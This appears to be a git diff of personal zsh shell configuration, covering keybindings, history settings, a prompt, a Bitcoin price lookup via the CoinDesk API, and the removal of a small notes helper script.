# Make ctrl+backwards work
bindkey "^[[1;5C" emacs-forward-word
bindkey "^[[1;5D" emacs-backward-word
# History
# Off
HISTFILE=~/.zsh_history
HISTSIZE=69
SAVEHIST=50
setopt appendhistory
# Opts
setopt AUTO_CD
@ -67,10 +72,9 @@ function git_prompt_info {
PROMPT='%{$fg[yellow]%}$(whoami)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '
# btc price check on coindesk
function btcp {
. torsocks on # Turn on for extra security
#. torsocks on # Turn on for extra security
echo "BTC price on CoinDesk "
curl -s https://api.coindesk.com/v1/bpi/currentprice.json | cut -d '"' -f 38
}

1
zsh_files/hacking.zsh
View File

@ -1 +0,0 @@
#TBA

25
zsh_files/vedas.zsh
View File

@ -1,25 +0,0 @@
fpath=(~/.cryptozsh_tools/v3das $fpath)
# Requirements
#autoload -U compinit
#compinit
#zstyle ':completion:*' menu select=2
function nls {
echo "\nYou can get help from the following topics:\n"
for f in ~/.cryptozsh_tools/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev | cut -d'.' -f1 | egrep -v "^_n"
done
echo ""
}
function n {
# query knowledgebase, use tab after n
if [ -d "~/.cryptozsh_tools/v3das" ]
then
echo "knowledge base / notes are missing"
else
cat ~/.cryptozsh_tools/v3das/$1
fi
}

3
zsh_files/zshrc 100755
View File

@ -0,0 +1,3 @@
source ~/.gen6zsh/general.zsh
source ~/.gen6zsh/crypto.zsh
source ~/.gen6zsh/gen6.zsh